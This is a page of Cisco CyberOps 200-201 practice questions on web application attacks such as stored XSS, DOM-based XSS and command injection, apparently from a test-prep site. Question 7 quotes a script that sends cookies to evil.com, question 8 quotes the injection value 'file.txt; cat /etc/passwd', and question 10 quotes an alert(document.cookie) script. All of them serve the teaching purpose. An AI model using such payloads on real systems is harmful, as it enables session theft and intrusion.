
CiscoCertified CyberOps Associate
Domain 2Objective 6
2.6 Describe Web Application Attacks, Such as SQL Injection, Command Injections, and Cross-Site Scripting 200-201 Practice Questions (Page 2)
Part of the 2.0 Security Monitoring domain, which accounts for 25% of the 200-201 exam. Cisco does not publish an official question count, but from its 120-minute exam (~50–80 total, ~13–20 in this domain), expect 1–2 from this objective — we provide 29 practice questions to prepare you well beyond it. (estimate)
29questions here
6free pages
3concepts
25%of the exam
Questions 6–10
- 6
A user reports that when they visit a forum page, their browser suddenly displays a pop-up with the text 'You are hacked!' and then redirects to a malicious site. The forum allows users to post messages that are stored and shown to all visitors. Which type of web application attack is most likely occurring?
Select an answer first - 7
A security analyst is examining a web application that allows users to post comments. The application stores comments in a database and displays them to other users. An attacker posts a comment containing `<script>document.location='https://evil.com?cookie='+document.cookie</script>`. When other users view the comment, their browser redirects to the attacker's site. Which of the following is the most effective mitigation?
Select an answer first - 8
A web application accepts a filename and passes it to a system shell command without sanitization. An attacker submits `file.txt; cat /etc/passwd`. What is the primary effect of this attack?
Select an answer first - 9
A security analyst is reviewing a web application that uses JavaScript to update the page content based on the `document.location.hash` value. The application does not send the hash value to the server. An attacker crafts a URL that causes the JavaScript to execute an alert box in the victim's browser. Which type of XSS is this?
Select an answer first - 10
A user reports that when they visit a company's product review page, their browser displays a pop-up that reads 'Your session has expired'. The pop-up appears only when the user is logged in. The security team finds that a review comment contains `<script>alert(document.cookie)</script>` and that the comment is stored in the database and rendered on the page for all visitors. Which type of attack is this, and what is the primary risk?
Select an answer first
Finished these 5 questions?
Review the revealed explanations, or continue through the curriculum.
Free Basic Practice is a study aid with revealable answers — not a scored exam. Examers.io is independent and not affiliated with or endorsed by Cisco. “200-201” is a trademark of its owner, used for identification only.